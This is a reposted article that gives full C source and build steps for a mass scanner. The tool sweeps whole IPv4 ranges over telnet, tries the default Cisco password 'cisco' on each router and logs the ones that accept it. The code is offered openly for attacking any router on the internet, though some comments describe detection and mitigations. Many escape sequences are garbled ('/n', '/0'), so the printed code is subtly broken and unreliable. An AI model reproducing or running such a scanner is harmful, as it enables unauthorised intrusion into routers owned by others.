
Mass Cisco Attacking

更新时间:2022-08-23 10:00:48

Mass Cisco Attacking
-------------------------

This article explains how to attack a Cisco router using password guessing.
The default telnet password on Cisco is "cisco". Using this knowledge, I created a
Cisco mass scanner to guess the telnet password on any router on the net!

gcc -o ipcombine ipcombine.c
gcc -o mass mass.c -lpthread
./ipcombine xxx xxx
./mass

======================= ipcombine.c =======================

#include <stdio.h>

/*
 *IP combiner code By Ph03n1X
 *http://kandangjamur.net || king_purba@yahoo.co.uk
*/

/*
 * ipcombine: append a list of dotted-quad IPv4 addresses to "server.txt"
 * in the current directory. mass.c on this page opens the same file name
 * for reading, one address per line.
 *
 * argv[1..3] give the leading one, two or three octets; the octets that
 * are not given are enumerated (0-255 for middle octets, 1-254 for the
 * last one, so .0 and .255 are skipped). That is 254 addresses for three
 * arguments, 256*254 for two and 256*256*254 for one.
 *
 * The arguments are converted with atoi() and are not range-checked, so
 * whatever integer atoi() yields is written into the address text.
 * The file is opened in append mode: repeated runs accumulate entries.
 *
 * For log analysis: the list is strictly ascending, so connection
 * attempts driven from it reach neighbouring addresses in numeric order.
 */
int main(int argc,char *argv[])
{
  FILE *fp;
  int bloka,blokb,blokc;
  int x,y,z;
  char IP[32];

  /* One to three octet arguments are accepted; anything else prints usage. */
  if(argc<2 || argc>4)
  {
    printf("Usage : %s <BLOK 1> <BLOK 2> <BLOK 3>/n",argv[0]);
    exit(0);
  }
  fp=fopen("server.txt","a");
  if(fp==NULL)
  {
    printf("Cannot create file/n");
    exit(0);
  }
  
  /* One octet given: enumerate the other three. */
  if(argc==2)
  {
    bloka=atoi(argv[1]);
    for(x=0;x<=255;x++){
      for(y=0;y<=255;y++){
        for(z=1;z<=254;z++){
	  snprintf(IP,sizeof(IP),"%d.%d.%d.%d",bloka,x,y,z);
          fprintf(fp,"%s/n",IP);
	}
      }
    }
    fclose(fp);
  }
  /* Two octets given: enumerate the last two. */
  else if(argc==3){
    bloka=atoi(argv[1]);
    blokb=atoi(argv[2]);
    for(y=0;y<=255;y++){
      for(z=1;z<=254;z++){
        snprintf(IP,sizeof(IP),"%d.%d.%d.%d",bloka,blokb,y,z);
        fprintf(fp,"%s/n",IP);
      }
    }
  fclose(fp);
  }
  /* Three octets given: enumerate only the host octet. */
  else if(argc==4){
    bloka=atoi(argv[1]);
    blokb=atoi(argv[2]);
    blokc=atoi(argv[3]);
      for(z=1;z<=254;z++){
         snprintf(IP,sizeof(IP),"%d.%d.%d.%d",bloka,blokb,blokc,z);
         fprintf(fp,"%s/n",IP);
      }
   }
}


======================== mass.c =========================

/*

Mass cisco scanner code By Ph03n1X
http://kandangjamur.net || king_purba@yahoo.co.uk

Mass Cisco scanner
Compile : gcc -o mass mass.c -lpthread
Usage :

1. Execute ipcombine first, ex : ./ipcombine 222 124
2. Execute mass, ex : ./mass

Reference :
1. http://www.securityfocus.com/tools/817
3. http://www.phenoelit.de/dpl/dpl.html

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* TCP port probed on every target (23 = telnet). */
#define PORT 23
/* Not referenced in the code visible here; scan_tcp() passes a literal 5
 * as the connect timeout instead. */
#define TIMEOUT 3
/* Upper bound used by main() to limit how many forked children are
 * outstanding at once. */
#define CHILDREN 250
/* Size of each receive buffer in scan_tcp(). */
#define SIZE 1024

/* Probe one target; defined below without an explicit return type. */
int scan_tcp(char *ip, int port);
/* connect() with a timeout in seconds; returns -1 on failure. */
int ctimeout(int sf, struct sockaddr *alamat,socklen_t len,int tout);
/* Number of lines read from the target list by main(). */
long hosts_scanned = 0;

/*
 * mass: read "server.txt" line by line and fork one child per line; each
 * child calls scan_tcp() on that line with PORT and then exits.
 *
 * argc/argv are not used. Returns 0 after the whole list has been read;
 * exits with status 1 if the list cannot be opened.
 *
 * Concurrency: `i` counts children that have been forked and not yet
 * reaped. Once it exceeds CHILDREN - 2 the parent blocks in wait() for
 * one child before reading the next line, so at most CHILDREN - 1
 * children are outstanding. After the last line the parent prints the
 * total and returns without waiting for the children still running.
 *
 * What this looks like from the network side: one source host holding up
 * to a few hundred simultaneous connection attempts to TCP/23 against
 * consecutive addresses. Flow records or firewall logs that count
 * distinct destinations on port 23 per source will show this pattern.
 */
int main(int argc, char **argv)
{
  int i = 0;
  FILE *fp;
  char IP[32];
  int status;

if((fp=fopen("server.txt","r"))==NULL)
{
   printf("File Not Found/n");
   exit(1);
}
  
while((fgets(IP,sizeof(IP),fp)) != NULL)
{
    hosts_scanned++;
    i++;
    /* Replaces the last character fgets() stored for this line
     * (normally the line terminator it keeps). */
    IP[strlen(IP) - 1] = '/0';

      switch (fork())
      {
	/* Child: probe this one target, then terminate. */
	case 0:
	{
	  scan_tcp(IP,PORT);
	  _exit(0);
	  break;
	}
	/* fork() failed: the parent stops here, status 0. */
	case -1:
	{
	  printf("fork error/n");
	  _exit(0);
	  break;
	}
	/* Parent: throttle by reaping one child once the cap is reached. */
	default:
	{
	  if(i > CHILDREN - 2)
	  {
	    wait(&status);
	    i--;
	  }
	  break;
	}
      }

    bzero(IP, sizeof(IP));
 }
 printf("Hosts being scanned: %ld/n", hosts_scanned);
 fclose(fp);
 return 0;
}

/*
 * connect() with an upper bound on how long the attempt may take.
 *
 *   sf     - socket descriptor to connect
 *   alamat - destination address ("alamat" is Indonesian for "address")
 *   len    - size of *alamat
 *   tout   - timeout in seconds
 *
 * Returns connect()'s own result if it is >= 0, 0 once the connection is
 * confirmed after waiting, and -1 on timeout or failure.
 *
 * The socket is switched to non-blocking before connect(). It is put back
 * into blocking mode only on the path that goes through select(); when
 * connect() returns >= 0 straight away the function returns with
 * O_NONBLOCK still set. errno is not examined after connect(), so every
 * negative result is handled as "in progress" and left to select().
 */
int ctimeout(int sf, struct sockaddr *alamat,socklen_t len,int tout)
{
	int res,slen,flags;
	struct timeval tv;
	struct sockaddr_in almt;
	fd_set rdf,wrf;

	/* Note: replaces the whole flag set with O_NONBLOCK rather than
	 * OR-ing it into the current flags. */
	fcntl(sf,F_SETFL,O_NONBLOCK);
	res = connect(sf,alamat,len);
	if (res>=0)return res;

	/* Wait until the socket is readable or writable, or tout elapses. */
	FD_ZERO(&rdf);
	FD_ZERO(&wrf);
	FD_SET(sf, &rdf);
	FD_SET(sf, &wrf);
	bzero(&tv, sizeof(tv));
	tv.tv_sec = tout;

	/* 0 = timed out, negative = select() error; both count as failure. */
	if (select(sf + 1, &rdf, &wrf, 0, &tv) <= 0)
		return -1;
	if (FD_ISSET(sf, &wrf) || FD_ISSET(sf, &rdf)) {
		/* getpeername() fails on a socket that is not connected, so
		 * it serves as the test for whether connect() succeeded. */
		slen = sizeof(almt);
		if (getpeername(sf, (struct sockaddr*)&almt, &slen) == -1)
			return -1;
		/* Connected: restore blocking mode for the recv()/send() calls
		 * the caller makes next. */
		flags = fcntl(sf, F_GETFL, NULL);
		fcntl(sf, F_SETFL, flags & ~O_NONBLOCK);
		return 0;
	}
	return -1;
}

/*
 * Probe one host: connect to `port`, read whatever the service sends
 * first, submit one fixed password string, and record the host in
 * "vulnerserver.txt" if the reply contains the character '>'.
 *
 *   target - host name or address text, resolved with gethostbyname()
 *   port   - TCP port to connect to
 *
 * Declared above as returning int, but defined here without a return
 * type and without a return statement; main() ignores the result.
 * The locals conn, len1, len2, len3 and pass are declared but unused.
 *
 * Behaviour that matters for detection and triage:
 *  - exactly one password is submitted per connection, about a second
 *    passes, and the session is closed; no user name is sent and there
 *    is no retry;
 *  - the code only calls recv()/send() on the raw socket and never
 *    answers anything the server sends, so the session does not look
 *    like an interactive telnet client;
 *  - the success test is a plain substring search for '>' in the second
 *    read, so an entry in the results file means "the reply contained
 *    '>'", not a verified login.
 *
 * Device-side mitigations for what is tested here: do not leave a
 * well-known password on the vty lines, accept SSH instead of telnet
 * (`transport input ssh`), limit which sources may reach the vty lines
 * (`access-class`), and throttle repeated failures (`login block-for`).
 */
scan_tcp(char *target,int port)
{
	FILE *ff;
	int s,conn,len1,len2,len3;
	struct sockaddr_in almt_ser;
	struct hostent *he;
	char servbuf1[SIZE],servbuf2[SIZE];
	char pass[12];

	/* Results file, opened in append mode by every child process. */
	ff=fopen("vulnerserver.txt","a");
        if(ff==NULL)
        {
                printf("File Not Found/n");
                exit(1);
        }

	/* Message below is Indonesian for "target host not found". */
	if((he=gethostbyname(target))==NULL)
	{
		printf("Host target tidak ditemukan/n");
		exit(0);
	}
	if((s=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("Cannot create socket/n");
		exit(0);
	}
	
	/* Build the IPv4 destination from the first resolved address. */
	bzero((char *) &almt_ser, sizeof(almt_ser));
	almt_ser.sin_family = AF_INET;
	bcopy( (char *)he->h_addr,(char *)&almt_ser.sin_addr.s_addr,he->h_length);
	almt_ser.sin_port = htons(port);

	/* Connect timeout is the literal 5 seconds, not the TIMEOUT macro.
	 * "tertutup" = closed, "terbuka" = open. */
	if((ctimeout(s,(struct sockaddr*)&almt_ser,sizeof(almt_ser),5))==-1)
	{
		printf("[ %s ] Port %d (TCP) tertutup/n",target,port);
	}
	else
	{
		printf("[ %s ] Port %d (TCP) terbuka/n",target,port);
		
		
		/* First read: whatever the service sends on connect. The
		 * contents are not inspected and recv()'s result is ignored. */
		memset(servbuf1,'/0',SIZE);
		recv(s,servbuf1,SIZE-1,0);
		
		/* The single password guess, followed by a one-second pause. */
		send(s,"cisco/r",6,0);		
		sleep(1);
	
		/* Second read: the reply to the guess. */
		memset(servbuf2,'/0',SIZE);
                recv(s,servbuf2,SIZE-1,0);

		/* '>' anywhere in the reply is treated as a command prompt,
		 * i.e. as an accepted password; the host is then logged. */
		if(strstr(servbuf2,">"))
		{
			printf("%s : Password Telnet /"cisco/"/n",target);
                        fprintf(ff,"%s : Password Telnet /"cisco/"/n",target);
                        fclose(ff);
		}else{
			printf("%s : Not Vulner/n",target);                        
                        fclose(ff);
		}
	}
        close(s);
}